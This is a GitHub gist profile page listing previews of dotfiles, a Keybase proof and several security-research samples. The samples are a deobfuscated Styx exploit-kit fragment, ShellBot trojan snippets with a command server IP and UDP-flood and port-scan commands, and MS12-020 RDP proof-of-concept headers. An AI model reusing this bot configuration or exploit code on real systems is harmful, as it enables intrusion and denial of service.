Skip to content

Instantly share code, notes, and snippets.

Avatar

James Espinosa jamesejr

View GitHub Profile
@jamesejr
jamesejr / keybase.md
Created Oct 3, 2014
GitHub identify proof for Keybase.io verification
View keybase.md

Keybase proof

I hereby claim:

  • I am jamesejr on github.
  • I am jamesejr (https://keybase.io/jamesejr) on keybase.
  • I have a public key whose fingerprint is 4FD5 7133 4DE8 A421 59D3 8A32 6586 A1B1 A40C 39F4

To claim this, I am signing this object:

@jamesejr
jamesejr / styx_ek.js
Last active Aug 29, 2015
A deobfuscated portion of the JavaScript code found on the Styx exploit kit
View styx_ek.js
function NyMpwEMG() {
var FHQxrYhsp = window.PluginDetect.getVersion("Java");
if (typeof FHQxrYhsp == 'string') {
FHQxrYhsp = FHQxrYhsp.split(",");
if (FHQxrYhsp[3].length == 1) {
FHQxrYhsp = "" + FHQxrYhsp[1] + "0" + FHQxrYhsp[3];
} else {
FHQxrYhsp = "" + FHQxrYhsp[1] + FHQxrYhsp[3];
}
} else {
@jamesejr
jamesejr / shellbot_a.pl
Last active Jan 1, 2016
A snippet of the Perl/ShellBot.B Trojan variant script targeting phpMyAdmin
View shellbot_a.pl
#!/usr/bin/perl
# ShellBOT
#
# Comenzi: !all
# - @udp <ip> <port> <timp>;
# - @fullportscan <ip> <start port> <final port>;
# - !quit;
# - !join <canal> <key> e !part <canal> <reason>;
# - !op !deop !voice !devoice <canal> <nick>;
# - !msg !ctcp 1 2;
@jamesejr
jamesejr / shellbot_b.pl
Last active Jan 1, 2016
A snippet of the Perl/ShellBot.B Trojan variant script observed from ISC Diary
View shellbot_b.pl
#!/usr/bin/perl
my @mast3rs = ("pizza");
my @hostauth = ("sosick.net");
my @admchan=("#X");
my @server = ("89.248.172.144");
$servidor= $server[rand scalar @server] unless $servidor;
my $xeqt = "''";
@jamesejr
jamesejr / .bash_profile
Created Dec 7, 2013
Personal .bash_profile file used by the Ruby Version Manager (RVM)
View .bash_profile
# Source our bashrc file, hacky?
source ~/.bashrc
export PATH=/usr/local/bin:$PATH
# Load RVM into a shell session, as a function
[[ -s "$HOME/.rvm/scripts/rvm" ]] && source "$HOME/.rvm/scripts/rvm"
@jamesejr
jamesejr / ruby-pack.txt
Created Aug 25, 2013
A list of Ruby directives for 'pack' e.g. [1,2,3].pack("CCn") => "\x01\x02\x00\x03"
View ruby-pack.txt
Integer | Array |
Directive | Element | Meaning
---------------------------------------------------------------------------
C | Integer | 8-bit unsigned (unsigned char)
S | Integer | 16-bit unsigned, native endian (uint16_t)
L | Integer | 32-bit unsigned, native endian (uint32_t)
Q | Integer | 64-bit unsigned, native endian (uint64_t)
| |
c | Integer | 8-bit signed (signed char)
s | Integer | 16-bit signed, native endian (int16_t)
@jamesejr
jamesejr / ms12-020.rb
Created Aug 24, 2013
MS12-020 Remote Desktop Protocol (RDP) Remote Code Execution PoC (Ruby)
View ms12-020.rb
#!/usr/bin/env ruby
#
# ms12-020 PoC attempt
#
# NOTE: This was crafted based on a legit connection packet capture and reversing
# a packet capture of the leaked MAPP PoC.
#
# by Joshua J. Drake (jduck)
#
@jamesejr
jamesejr / ms12-020.py
Created Aug 24, 2013
MS12-020 Remote Desktop Protocol (RDP) Remote Code Execution PoC (Python)
View ms12-020.py
#
#
# ms12-020 "chinese shit" PoC v2 (wireshark version)
#
# tested on winsp3 spanish, reported to work on Win7, win 2008
#
# original source: http://115.com/file/be27pff7
#
#
@jamesejr
jamesejr / .vimrc
Last active Dec 18, 2015 — forked from todb-r7/.vimrc
Personal .vimrc file used for Metasploit Framework development
View .vimrc
" If using Janus, then this should be .vimrc.after
" Technically this is really a gvimrc but who's counting.
set nocompatible
colorscheme slate
filetype plugin indent on
set hls
" Metasploit's current default tabs
set tabstop=2 softtabstop=2 shiftwidth=2 noexpandtab shiftround smarttab
@jamesejr
jamesejr / sublime-settings
Last active May 15, 2019
Personal customized Sublime Text 3 configuration file with Inconsolata font
View sublime-settings
{
"bold_folder_labels": true,
"caret_extra_width": 1,
"caret_style": "phase",
"close_windows_when_empty": false,
"color_scheme": "Packages/Theme - Spacegray/base16-ocean.dark.tmTheme",
"draw_minimap_border": true,
"enable_tab_scrolling": false,
"font_face": "Inconsolata",
"font_options":
You can’t perform that action at this time.